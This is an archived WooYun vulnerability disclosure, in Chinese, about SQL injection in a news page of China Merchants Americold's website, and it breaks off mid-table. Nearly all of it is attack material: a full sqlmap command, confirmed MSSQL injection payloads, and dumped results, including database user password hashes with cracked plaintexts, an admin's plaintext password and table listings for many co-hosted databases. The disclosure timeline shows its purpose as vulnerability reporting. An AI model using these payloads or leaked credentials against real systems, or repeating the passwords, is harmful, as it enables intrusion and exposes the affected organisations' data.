乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
招商美冷由招商局物流集团有限公司(招商物流)和Americold Realty Trust(美冷)合资成立,是国内大型公共冷链服务商。公司依托双方股东在品牌、资本、网络、客户及专业经验等方面的资源优势,致力于为客户提供一体化的冷链服务方案。
地址:http://**.**.**.**/newsinfo.aspx?id=240&nid=6
python sqlmap.py -u "http://**.**.**.**/newsinfo.aspx?id=240&nid=6" -p id --technique=BEQU --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
1. DBA权限,系统管理员密码泄露
current user: 'kaidexuncn'current user is DBA: Truedatabase management system users [5]:[*] dtcms[*] kaidexuncn[*] qmkgb[*] qunxinmoyi[*] saitelldatabase management system users password hashes:[*] dtcms [1]: password hash: 0x0100fd111b6c8f75783b8bcf759f2733d9342b44a536b4780044 header: 0x0100 salt: fd111b6c mixedcase: 8f75783b8bcf759f2733d9342b44a536b4780044 clear-text password: 123[*] kaidexuncn [1]: password hash: 0x0100c89f692785f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b header: 0x0100 salt: c89f6927 mixedcase: 85f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b clear-text password: 123qwe[*] qmkgb [1]: password hash: 0x01004b95e52c43c7b23218d926dab2b3b0897967bfbf5a69e3f9 header: 0x0100 salt: 4b95e52c mixedcase: 43c7b23218d926dab2b3b0897967bfbf5a69e3f9[*] qunxinmoyi [1]: password hash: 0x01003ba732eb8d325664842eb725779c2c9db3fbe53580b7554c header: 0x0100 salt: 3ba732eb mixedcase: 8d325664842eb725779c2c9db3fbe53580b7554c[*] saitell [1]: password hash: 0x0100a424c77393058000e8c0e0e41d6bc617e93aaa4c95b5b25b header: 0x0100 salt: a424c773 mixedcase: 93058000e8c0e0e41d6bc617e93aaa4c95b5b25b
2. 15万系统日志泄露
Database: master+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| sys.messages | 76640 || sys.sysmessages | 76640 |
3. admin明文密码泄露
Database: rcsw1Table: admin[1 entry]+----------+| password |+----------+| szhuhang |+----------+
---Parameter: id (GET) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (9153=9153) THEN 9153 ELSE 9153*(SELECT 9153 FROM master..sysdatabases) END))&nid=6 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=240 AND 6796=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6796=6796) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113)))&nid=6 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4067=4067) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))&nid=6 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=240 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(71)+CHAR(107)+CHAR(100)+CHAR(70)+CHAR(120)+CHAR(122)+CHAR(85)+CHAR(65)+CHAR(72)+CHAR(78)+CHAR(84)+CHAR(115)+CHAR(116)+CHAR(119)+CHAR(83)+CHAR(71)+CHAR(80)+CHAR(109)+CHAR(111)+CHAR(119)+CHAR(82)+CHAR(79)+CHAR(74)+CHAR(84)+CHAR(118)+CHAR(68)+CHAR(81)+CHAR(84)+CHAR(102)+CHAR(70)+CHAR(97)+CHAR(81)+CHAR(105)+CHAR(75)+CHAR(90)+CHAR(107)+CHAR(66)+CHAR(117)+CHAR(73)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL-- -&nid=6---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current user: 'kaidexuncn'current user is DBA: Truedatabase management system users [5]:[*] dtcms[*] kaidexuncn[*] qmkgb[*] qunxinmoyi[*] saitelldatabase management system users password hashes:[*] dtcms [1]: password hash: 0x0100fd111b6c8f75783b8bcf759f2733d9342b44a536b4780044 header: 0x0100 salt: fd111b6c mixedcase: 8f75783b8bcf759f2733d9342b44a536b4780044 clear-text password: 123[*] kaidexuncn [1]: password hash: 0x0100c89f692785f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b header: 0x0100 salt: c89f6927 mixedcase: 85f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b clear-text password: 123qwe[*] qmkgb [1]: password hash: 0x01004b95e52c43c7b23218d926dab2b3b0897967bfbf5a69e3f9 header: 0x0100 salt: 4b95e52c mixedcase: 43c7b23218d926dab2b3b0897967bfbf5a69e3f9[*] qunxinmoyi [1]: password hash: 0x01003ba732eb8d325664842eb725779c2c9db3fbe53580b7554c header: 0x0100 salt: 3ba732eb mixedcase: 8d325664842eb725779c2c9db3fbe53580b7554c[*] saitell [1]: password hash: 0x0100a424c77393058000e8c0e0e41d6bc617e93aaa4c95b5b25b header: 0x0100 salt: a424c773 mixedcase: 93058000e8c0e0e41d6bc617e93aaa4c95b5b25bDatabase: hckj+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.serverDesc | 29 || dbo.newsclass | 21 || dbo.product | 19 || dbo.project | 9 || dbo.admin | 1 |+----------------------------------------+---------+Database: kaidexuncn+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.Product | 32 || dbo.en_newsclass | 16 || dbo.newsclass | 16 || dbo.proclass | 14 || dbo.newsContent | 12 || dbo.Members | 10 || dbo.diaocha | 6 || dbo.links | 4 || dbo.downclass | 2 || dbo.downContent | 2 || dbo.en_guestbook | 2 || dbo.admin | 1 || dbo.city | 1 || dbo.cooperation | 1 || dbo.emailInfo | 1 || dbo.en_newsContent | 1 || dbo.en_proclass | 1 || dbo.en_webInfo | 1 || dbo.toJoin | 1 || dbo.webInfo | 1 |+----------------------------------------+---------+Database: cqrhyJapanese+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.product | 234 || dbo.newsclass | 28 || dbo.ggt | 5 || dbo.admin | 1 |+----------------------------------------+---------+Database: juchikeji+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.newsContent | 64 || dbo.Product | 32 || dbo.newsclass | 21 || dbo.en_newsclass | 16 || dbo.proclass | 14 || dbo.Members | 10 || dbo.diaocha | 6 || dbo.links | 6 || dbo.downclass | 4 || dbo.ApplyCooperation | 3 || dbo.downContent | 2 || dbo.en_guestbook | 2 || dbo.admin | 1 || dbo.city | 1 || dbo.cooperation | 1 || dbo.emailInfo | 1 || dbo.en_newsContent | 1 || dbo.en_proclass | 1 || dbo.en_webInfo | 1 || dbo.toJoin | 1 || dbo.webInfo | 1 |+----------------------------------------+---------+Database: mjkj+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.picView | 23 || dbo.productPic | 23 || dbo.productPic | 23 || dbo.newsclass | 22 || dbo.proView | 21 || dbo.feedback | 11 || dbo.admin | 1 |+----------------------------------------+---------+Database: qiaolu+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.product | 99 || dbo.productView | 99 || dbo.newsclass | 26 || dbo.feedback | 4 || dbo.admin | 2 |+----------------------------------------+---------+Database: msdb+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.MSdbms_datatype_mapping | 325 || dbo.MSdbms_datatype_mapping | 325 || dbo.MSdbms_datatype_mapping | 325 || dbo.sysdatatypemappings | 325 || dbo.MSdbms_map | 248 || dbo.MSdatatype_mappings | 174 || dbo.syscategories | 21 || dbo.backupfilegroup | 5 || dbo.backupfilegroup | 5 || dbo.backupset | 5 || dbo.backupmediafamily | 3 || dbo.backupmediaset | 3 || dbo.sysdbmaintplans | 1 |+----------------------------------------+---------+Database: rcsw1+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.newsclass | 11 || dbo.serverDesc | 6 || dbo.admin | 1 |+----------------------------------------+---------+Database: ReportServer+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.ConfigurationInfo | 19 || dbo.Roles | 8 || dbo.PolicyUserRole | 4 || dbo.Users | 3 || dbo.Keys | 2 || dbo.Policies | 2 || dbo.SecData | 2 || dbo.Catalog | 1 |+----------------------------------------+---------+Database: master+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| sys.messages | 76640 || sys.sysmessages | 76640 || sys.syscolumns | 11273 || sys.dm_os_buffer_descriptors | 10596 || sys.all_parameters | 6761 || sys.dm_os_memory_objects | 5184 || sys.all_columns | 4307 || sys.dm_os_memory_cache_entries | 3967 || sys.system_columns | 3749 || sys.syscomments | 2798 || sys.dm_os_ring_buffers | 2687 || sys.dm_os_virtual_address_dump | 2506 || sys.syscacheobjects | 2412 || dbo.spt_values | 2346 || sys.dm_exec_cached_plans | 2148 || sys.all_objects | 1841 || sys.sysobjects | 1841 || sys.database_permissions | 1688 || sys.syspermissions | 1687 || sys.sysprotects | 1679 || sys.all_sql_modules | 1623 || sys.dm_os_performance_counters | 1142 || sys.sysperfinfo | 1142 || sys.dm_db_index_usage_stats | 846 || sys.columns | 558 || sys.dm_exec_query_transformation_stats | 380 || sys.stats_columns | 298 || sys.stats_columns | 298 || sys.all_views | 286 || sys.index_columns | 219 || sys.sysindexkeys | 219 || sys.dm_os_memory_cache_clock_hands | 208 || sys.dm_os_wait_stats | 202 || sys.event_notification_event_types | 193 || sys.dm_os_memory_clerks | 187 || sys.sysindexes | 180 || sys.dm_os_latch_stats | 138 || sys.syscharsets | 114 || sys.allocation_units | 112 || sys.dm_os_memory_cache_counters | 104 || sys.dm_db_partition_stats | 101 || sys.dm_exec_query_stats | 101 || sys.indexes | 101 || sys.partitions | 101 || sys.dm_os_loaded_modules | 92 || sys.objects | 68 || sys.configurations | 63 || sys.sysconfigures | 63 || sys.syscurconfigs | 63 || sys.dm_os_memory_cache_hash_tables | 58 || INFORMATION_SCHEMA.COLUMNS | 50 || sys.fulltext_document_types | 50 || sys.dm_os_threads | 46 || sys.master_files | 46 || sys.sysaltfiles | 46 || INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 || sys.dm_exec_query_optimizer_info | 38 || sys.dm_os_worker_local_storage | 35 || sys.dm_os_workers | 35 || sys.dm_os_memory_pools | 34 || sys.syslanguages | 33 || sys.server_principals | 27 || sys.dm_os_tasks | 24 || sys.server_permissions | 24 || sys.database_principals | 23 || sys.database_recovery_status | 23 || sys.databases | 23 || sys.sysdatabases | 23 || sys.securable_classes | 21 || sys.dm_db_session_space_usage | 20 || sys.dm_db_task_space_usage | 20 || sys.dm_exec_sessions | 20 || sys.dm_tran_active_transactions | 20 || sys.dm_tran_database_transactions | 20 || sys.sysprocesses | 19 || sys.dm_exec_requests | 18 || sys.syslogins | 18 || INFORMATION_SCHEMA.SCHEMATA | 17 || sys.fulltext_languages | 17 || sys.schemas | 17 || sys.service_message_types | 14 || sys.dm_os_stacks | 13 || sys.dm_os_waiting_tasks | 11 || sys.service_contract_message_usages | 11 || sys.server_role_members | 10 || sys.crypt_properties | 8 || sys.dm_db_missing_index_details | 7 || sys.dm_db_missing_index_group_stats | 7 || sys.dm_db_missing_index_groups | 7 || sys.dm_os_schedulers | 7 || INFORMATION_SCHEMA.TABLES | 6 || sys.service_contracts | 6 || sys.sql_logins | 6 || INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 || sys.certificates | 5 || sys.endpoints | 5 || sys.database_role_members | 4 || sys.procedures | 4 || sys.sysmembers | 4 || dbo.MSreplication_options | 3 || sys.dm_clr_properties | 3 || sys.dm_os_hosts | 3 || sys.identity_columns | 3 || sys.internal_tables | 3 || sys.login_token | 3 || sys.service_queue_usages | 3 || sys.service_queues | 3 || sys.services | 3 || sys.syssegments | 3 || INFORMATION_SCHEMA.ROUTINES | 2 || sys.database_files | 2 || sys.dm_broker_queue_monitors | 2 || sys.dm_exec_query_resource_semaphores | 2 || sys.dm_fts_memory_pools | 2 || sys.dm_tran_locks | 2 || sys.extended_procedures | 2 || sys.key_encryptions | 2 || sys.service_contract_usages | 2 || sys.sql_modules | 2 || sys.sysfiles | 2 || sys.syslockinfo | 2 || dbo.spt_monitor | 1 || sys.data_spaces | 1 || sys.default_constraints | 1 || sys.dm_db_file_space_usage | 1 || sys.dm_exec_background_job_queue_stats | 1 || sys.dm_exec_background_job_queue_stats | 1 || sys.dm_exec_connections | 1 || sys.dm_os_sys_info | 1 || sys.dm_tran_current_transaction | 1 || sys.filegroups | 1 || sys.linked_logins | 1 || sys.routes | 1 || sys.servers | 1 || sys.symmetric_keys | 1 || sys.sysconstraints | 1 || sys.sysfilegroups | 1 || sys.sysoledbusers | 1 || sys.sysservers | 1 |+----------------------------------------+---------+Database: saitell+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.ams_Log | 100 || dbo.ams_ModuleAuthorization | 52 || dbo.ams_ModuleAuthorization | 52 || dbo.ams_RoleAuthorization | 25 || dbo.ams_RoleAuthorization | 25 || dbo.cms_Context | 22 || dbo.cms_Catalog | 17 || dbo.cms_Product | 11 || dbo.cms_File | 8 || dbo.ams_ModuleConfiguration | 6 || dbo.ams_Member | 3 || dbo.cms_Image | 3 || dbo.ams_AuthorizationType | 2 |+----------------------------------------+---------+Database: siyi+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.newsclass | 14 || dbo.cms_Catalog | 12 || dbo.ggt | 9 || dbo.product | 5 || dbo.brandPic | 4 || dbo.brandPic | 4 || dbo.pictures | 4 || dbo.cms_Makeup | 2 || dbo.admin | 1 || dbo.leaveComments | 1 |+----------------------------------------+---------+Database: zhaoshangmeileng+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.newsContent | 173 || dbo.Product | 32 || dbo.newsclass | 22 || dbo.en_newsclass | 16 || dbo.proclass | 14 || dbo.Members | 10 || dbo.diaocha | 6 || dbo.downclass | 4 || dbo.syscommand | 3 || dbo.admin | 2 || dbo.downContent | 2 || dbo.en_guestbook | 2 || dbo.links | 2 || dbo.LSB | 2 || dbo.system32 | 2 || dbo.city | 1 || dbo.cooperation | 1 || dbo.emailInfo | 1 || dbo.en_newsContent | 1 || dbo.en_proclass | 1 || dbo.en_webInfo | 1 || dbo.toJoin | 1 || dbo.webInfo | 1 |+----------------------------------------+---------+Database: cqrhyEnglish+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.product | 234 || dbo.newsclass | 28 || dbo.ggt | 5 || dbo.admin | 1 |+----------------------------------------+---------+Database: qmkgb+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.Blog_SiteLogs | 24608 || dbo.Sys_Elink | 3479 || dbo.v_Blog_SiteLogsDetail_ByIP | 2135 || dbo.blog_Tag | 1028 || dbo.v_Blog_Tag | 1028 || dbo.blog_Keyword | 681 || dbo.Blog_SiteLoginLogs | 478 || dbo.Sys_ExpressCountry | 226 || dbo.Sys_ExpressCountry | 226 || dbo.v_Blog_SiteLogsCount_ByTagName | 221 || dbo.v_Use_Photo | 211 || dbo.blog_ArticlePhoto | 209 || dbo.v_Blog_ArticlePhoto | 209 || dbo.blog_ArticleTag | 204 || dbo.menu | 198 || dbo.blog_ArticleRelatedTwo | 108 || dbo.Blog_ArticleSmall | 86 || dbo.Blog_ArticleMemo | 83 || dbo.blog_Menu | 83 || dbo.blog_ArticleRelated | 67 || dbo.v_Use_Tag | 46 || dbo.blog_Category | 42 || dbo.Blog_CategorySmall | 42 || dbo.v_Blog_Category | 42 || dbo.blog_NavigationDetail | 34 || dbo.blog_NavigationDetail | 34 || dbo.v_Blog_ArticleTag_BestLogUrl | 21 || dbo.v_Blog_ArticleTag_BestLogUrl | 21 || dbo.blog_ArticleTypePhoto | 19 || dbo.v_blog_ArticleTag_Tag | 18 || dbo.Blog_SiteParamter | 16 || dbo.blog_TemplateType | 8 || dbo.blog_MasterPage | 7 || dbo.Ad_AdType | 6 || dbo.blog_CommentDoc | 6 || dbo.blog_CommentDoc | 6 || dbo.blog_CommentType | 6 || dbo.blog_FinishersType | 6 || dbo.blog_PageType | 5 || dbo.Ad_AdDetail | 4 || dbo.Ad_AdGroup | 4 || dbo.blog_ArticleFlag | 4 || dbo.blog_NavigationType | 4 || dbo.blog_ArticleTypeField | 3 || dbo.blog_ArticleTypeField | 3 || dbo.blog_Flag | 3 || dbo.blog_ArticleTypeFieldType | 2 || dbo.Blog_Member_Power | 2 || dbo.blog_Origin | 2 || dbo.blog_SiteSetting | 1 || dbo.blog_TagType | 1 || dbo.blog_Theme | 1 |+----------------------------------------+---------+Database: Muban+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.Channel | 42 || dbo.Products | 33 || dbo.Product_album | 12 || dbo.查询5 | 10 || dbo.MyContent | 6 || dbo.MyKey | 5 || dbo.QQ | 5 || dbo.Article_comment | 3 || dbo.Article_comment | 3 || dbo.Contents | 3 || dbo.DingDan | 3 || dbo.PageMessage | 3 || dbo.Adbanner | 2 || dbo.HY_User | 2 || dbo.MyData | 2 || dbo.Administrator | 1 || dbo.Advertising | 1 || dbo.ArticleEdit | 1 || dbo.Comment | 1 || dbo.Feedback | 1 || dbo.Links | 1 || dbo.ShoppingCart | 1 || dbo.查询3 | 1 |+----------------------------------------+---------+Database: yideng_data+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.CB_Area | 2911 || dbo.CB_Log | 1700 || dbo.CB_Productdigg | 566 || dbo.CB_City | 340 || dbo.CB_ProPic | 184 || dbo.CB_ProClass | 144 || dbo.CB_AdminMenu | 69 || dbo.CB_ShopList | 60 || dbo.CB_Member_Product | 40 || dbo.CB_Partners | 40 || dbo.CB_Trade | 37 || dbo.CB_Province | 35 || dbo.CB_OrderList | 28 || dbo.CB_ReplyProduct | 22 || dbo.CB_GuestBook | 17 || dbo.CB_Snapping_Product | 16 || dbo.CB_Snapping_Product | 16 || dbo.V_Product_Reply | 16 || dbo.CB_HotKey | 15 || dbo.Web_Content | 15 || dbo.CB_Prize | 14 || dbo.V_PrizeCount | 14 || dbo.CB_NewsClass | 12 || dbo.CB_NewsClass | 12 || dbo.CB_Member_ProClass | 11 || dbo.CB_SEO | 11 || dbo.Article_reply | 10 || dbo.CB_PointLog | 10 || dbo.CB_Member_News | 9 || dbo.CB_Member_News | 9 || dbo.CB_FriendLink | 7 || dbo.CB_Store | 7 || dbo.CB_UserPrize | 7 || dbo.V_UserPrize | 7 || dbo.CB_MemberGroup | 6 || dbo.CB_FaqClass | 5 || dbo.CB_FaqClass | 5 || dbo.CB_Product_Guest | 4 || dbo.CB_Product_Guest | 4 || dbo.CB_Sales | 4 || dbo.CB_ShippingAddress | 4 || dbo.CB_Admin_Group | 3 || dbo.CB_Admin_Group | 3 || dbo.CB_Discount | 3 || dbo.CB_Brand | 2 || dbo.CB_OrderShip | 2 || dbo.CB_UserFav | 2 || dbo.CB_DataBack | 1 || dbo.CB_EmailListGroup | 1 || dbo.CB_EmailListGroup | 1 || dbo.CB_EmailListGroup | 1 || dbo.CB_EmailTask | 1 || dbo.CB_Package | 1 || dbo.CB_Smtp | 1 || dbo.CB_WEBINFO | 1 || dbo.V_UserFav | 1 |+----------------------------------------+---------+Database: yrw+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.setBgPic | 147 || dbo.product | 90 || dbo.newsclass | 40 || dbo.leaveComments | 13 || dbo.cms_Catalog | 6 || dbo.cms_Resource | 6 || dbo.downclass | 3 || dbo.downContent | 3 || dbo.emailSend | 2 || dbo.admin | 1 |+----------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: hckjTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: hckjTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: hckjTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: hckjTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: hckjTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: hckjTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: hckjTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: hckjTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: kaidexuncnTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: kaidexuncnTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: kaidexuncnTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: kaidexuncnTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: kaidexuncnTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: kaidexuncnTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: kaidexuncnTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: kaidexuncnTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: cqrhyJapaneseTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: cqrhyJapaneseTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: cqrhyJapaneseTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: cqrhyJapaneseTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: cqrhyJapaneseTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: cqrhyJapaneseTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: cqrhyJapaneseTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: cqrhyJapaneseTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: juchikejiTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: juchikejiTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: juchikejiTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: juchikejiTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: juchikejiTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: juchikejiTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: juchikejiTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: juchikejiTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: mjkjTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: mjkjTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: mjkjTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: mjkjTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: mjkjTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: mjkjTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: mjkjTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: mjkjTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: qiaoluTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: qiaoluTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: qiaoluTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: qiaoluTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: qiaoluTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: qiaoluTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: qiaoluTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: qiaoluTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: msdbTable: backupset[1 column]+-----------------------+------+| Column | Type |+-----------------------+------+| is_password_protected | bit |+-----------------------+------+Database: msdbTable: backupmediaset[1 column]+-----------------------+------+| Column | Type |+-----------------------+------+| is_password_protected | bit |+-----------------------+------+Database: rcsw1Table: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: rcsw1Table: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: rcsw1Table: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: rcsw1Table: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: rcsw1Table: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: rcsw1Table: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: rcsw1Table: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: rcsw1Table: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: ReportServerTable: DataSource[1 column]+----------+-------+| Column | Type |+----------+-------+| Password | image |+----------+-------+Database: masterTable: sysoledbusers[1 column]+-------------+----------+| Column | Type |+-------------+----------+| rmtpassword | nvarchar |+-------------+----------+Database: masterTable: syslogins[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: masterTable: sysusers[1 column]+----------+-----------+| Column | Type |+----------+-----------+| password | varbinary |+----------+-----------+Database: masterTable: sql_logins[1 column]+---------------+-----------+| Column | Type |+---------------+-----------+| password_hash | varbinary |+---------------+-----------+Database: siyiTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: siyiTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: siyiTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: siyiTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: siyiTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: siyiTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: siyiTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: siyiTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: zhaoshangmeilengTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: zhaoshangmeilengTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: zhaoshangmeilengTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: zhaoshangmeilengTable: pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: zhaoshangmeilengTable: en_admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: zhaoshangmeilengTable: en_emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: zhaoshangmeilengTable: emailInfo[1 column]+----------+----------+| Column | Type |+----------+----------+| sendPass | nvarchar |+----------+----------+Database: zhaoshangmeilengTable: admin[1 column]+----------+----------+| Column | Type |+----------+----------+| password | nvarchar |+----------+----------+Database: cqrhyEnglishTable: en_pay[1 column]+----------+---------+| Column | Type |+----------+---------+| userPass | varchar |+----------+---------+Database: cqrhyEnglishTable: Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: cqrhyEnglishTable: en_Members[1 column]+----------+---------+| Column | Type |+----------+---------+| password | varchar |+----------+---------+Database: cqrhyEnglishTable: pay[1 column]+----------+---------+| 